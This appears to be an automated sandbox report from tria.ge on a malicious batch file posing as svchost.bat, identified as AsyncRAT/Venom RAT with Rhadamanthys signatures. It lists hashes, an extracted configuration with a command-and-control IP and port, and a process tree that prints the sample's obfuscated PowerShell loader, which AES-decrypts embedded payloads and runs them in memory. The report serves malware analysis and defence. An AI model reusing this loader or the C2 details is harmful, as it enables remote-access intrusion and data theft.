Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
275s -
max time network
275s -
platform
windows11-21h2_x64 -
resource
win11-20240709-en -
resource tags
arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system -
submitted
09/07/2024, 21:35
Static task
static1
Behavioral task
behavioral1
Sample
svchost.bat
Resource
win11-20240709-en
General
-
Target
svchost.bat
-
Size
396KB
-
MD5
8eeff7476b9e0d2c7b56538d7cc98e7a
-
SHA1
84991e8c34d6e9cefb7b5d8b79202d5fc5935396
-
SHA256
908fd49bd1d8751057fa509240b3dd3e161e9af3e1440d927d919c01eb949ad2
-
SHA512
174311a059e3b2bd16029a80e4b0bf007d0b31a54395f8a036c53e2905aaf4656c30c51a9dff4880bbc2b6bb3e0a237ad35e126367a00b456f3e426f58ddc919
-
SSDEEP
12288:71qhIV59Nm/Jzw5WwHdKkZGmgEI9oOC/zupA9csmX:7CIRNm/O5WwHdpZOEI9C6pAvW
Malware Config
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
147.185.221.20:49485
RANDOM-SHIT
-
delay
3
-
install
true
-
install_file
svchost.exe
-
install_folder
%AppData%
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 3324 created 2244 3324 Explorer.EXE 50 -
Async RAT payload 1 IoCs
resource yara_rule behavioral1/memory/2860-35-0x0000026AD5700000-0x0000026AD5718000-memory.dmp family_asyncrat -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe -
Suspicious use of AdjustPrivilegeToken 57 IoCs
description pid Process Token: SeDebugPrivilege 2860 powershell.exe Token: SeIncreaseQuotaPrivilege 2860 powershell.exe Token: SeSecurityPrivilege 2860 powershell.exe Token: SeTakeOwnershipPrivilege 2860 powershell.exe Token: SeLoadDriverPrivilege 2860 powershell.exe Token: SeSystemProfilePrivilege 2860 powershell.exe Token: SeSystemtimePrivilege 2860 powershell.exe Token: SeProfSingleProcessPrivilege 2860 powershell.exe Token: SeIncBasePriorityPrivilege 2860 powershell.exe Token: SeCreatePagefilePrivilege 2860 powershell.exe Token: SeBackupPrivilege 2860 powershell.exe Token: SeRestorePrivilege 2860 powershell.exe Token: SeShutdownPrivilege 2860 powershell.exe Token: SeDebugPrivilege 2860 powershell.exe Token: SeSystemEnvironmentPrivilege 2860 powershell.exe Token: SeRemoteShutdownPrivilege 2860 powershell.exe Token: SeUndockPrivilege 2860 powershell.exe Token: SeManageVolumePrivilege 2860 powershell.exe Token: 33 2860 powershell.exe Token: 34 2860 powershell.exe Token: 35 2860 powershell.exe Token: 36 2860 powershell.exe Token: SeIncreaseQuotaPrivilege 2860 powershell.exe Token: SeSecurityPrivilege 2860 powershell.exe Token: SeTakeOwnershipPrivilege 2860 powershell.exe Token: SeLoadDriverPrivilege 2860 powershell.exe Token: SeSystemProfilePrivilege 2860 powershell.exe Token: SeSystemtimePrivilege 2860 powershell.exe Token: SeProfSingleProcessPrivilege 2860 powershell.exe Token: SeIncBasePriorityPrivilege 2860 powershell.exe Token: SeCreatePagefilePrivilege 2860 powershell.exe Token: SeBackupPrivilege 2860 powershell.exe Token: SeRestorePrivilege 2860 powershell.exe Token: SeShutdownPrivilege 2860 powershell.exe Token: SeDebugPrivilege 2860 powershell.exe Token: SeSystemEnvironmentPrivilege 2860 powershell.exe Token: SeRemoteShutdownPrivilege 2860 powershell.exe Token: SeUndockPrivilege 2860 powershell.exe Token: SeManageVolumePrivilege 2860 powershell.exe Token: 33 2860 powershell.exe Token: 34 2860 powershell.exe Token: 35 2860 powershell.exe Token: 36 2860 powershell.exe Token: SeShutdownPrivilege 3324 Explorer.EXE Token: SeCreatePagefilePrivilege 3324 Explorer.EXE Token: SeShutdownPrivilege 3324 Explorer.EXE Token: SeCreatePagefilePrivilege 3324 Explorer.EXE Token: SeShutdownPrivilege 3324 Explorer.EXE Token: SeCreatePagefilePrivilege 3324 Explorer.EXE Token: SeShutdownPrivilege 3324 Explorer.EXE Token: SeCreatePagefilePrivilege 3324 Explorer.EXE Token: SeShutdownPrivilege 3324 Explorer.EXE Token: SeCreatePagefilePrivilege 3324 Explorer.EXE Token: SeShutdownPrivilege 3324 Explorer.EXE Token: SeCreatePagefilePrivilege 3324 Explorer.EXE Token: SeShutdownPrivilege 3324 Explorer.EXE Token: SeCreatePagefilePrivilege 3324 Explorer.EXE -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 3312 wrote to memory of 3144 3312 cmd.exe 82 PID 3312 wrote to memory of 3144 3312 cmd.exe 82 PID 3312 wrote to memory of 2860 3312 cmd.exe 83 PID 3312 wrote to memory of 2860 3312 cmd.exe 83 PID 2860 wrote to memory of 3324 2860 powershell.exe 53 PID 3324 wrote to memory of 1632 3324 Explorer.EXE 84 PID 3324 wrote to memory of 1632 3324 Explorer.EXE 84 PID 3324 wrote to memory of 1632 3324 Explorer.EXE 84 PID 3324 wrote to memory of 1632 3324 Explorer.EXE 84
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2244
-
C:\Windows\system32\openwith.exe"C:\Windows\system32\openwith.exe"2⤵PID:1632
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3324 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\svchost.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3312 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('n9ZmU5/PC5KtVx1quQV0tSXT3NElOxxx6q5t6hjaxWA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5OqvQAvAr9GTRWmouqMfEQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $qtKDW=New-Object System.IO.MemoryStream(,$param_var); $MgUrt=New-Object System.IO.MemoryStream; $FhzHj=New-Object System.IO.Compression.GZipStream($qtKDW, [IO.Compression.CompressionMode]::Decompress); $FhzHj.CopyTo($MgUrt); $FhzHj.Dispose(); $qtKDW.Dispose(); $MgUrt.Dispose(); $MgUrt.ToArray();}function execute_function($param_var,$param2_var){ $xZsKh=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $bIPsk=$xZsKh.EntryPoint; $bIPsk.Invoke($null, $param2_var);}$MDTVT = 'C:\Users\Admin\AppData\Local\Temp\svchost.bat';$host.UI.RawUI.WindowTitle = $MDTVT;$yugZz=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($MDTVT).Split([Environment]::NewLine);foreach ($pgATY in $yugZz) { if ($pgATY.StartsWith('qAbBQpLuRAqBaeIZIbhf')) { $UxrsW=$pgATY.Substring(20); break; }}$payloads_var=[string[]]$UxrsW.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:3144
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2860
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82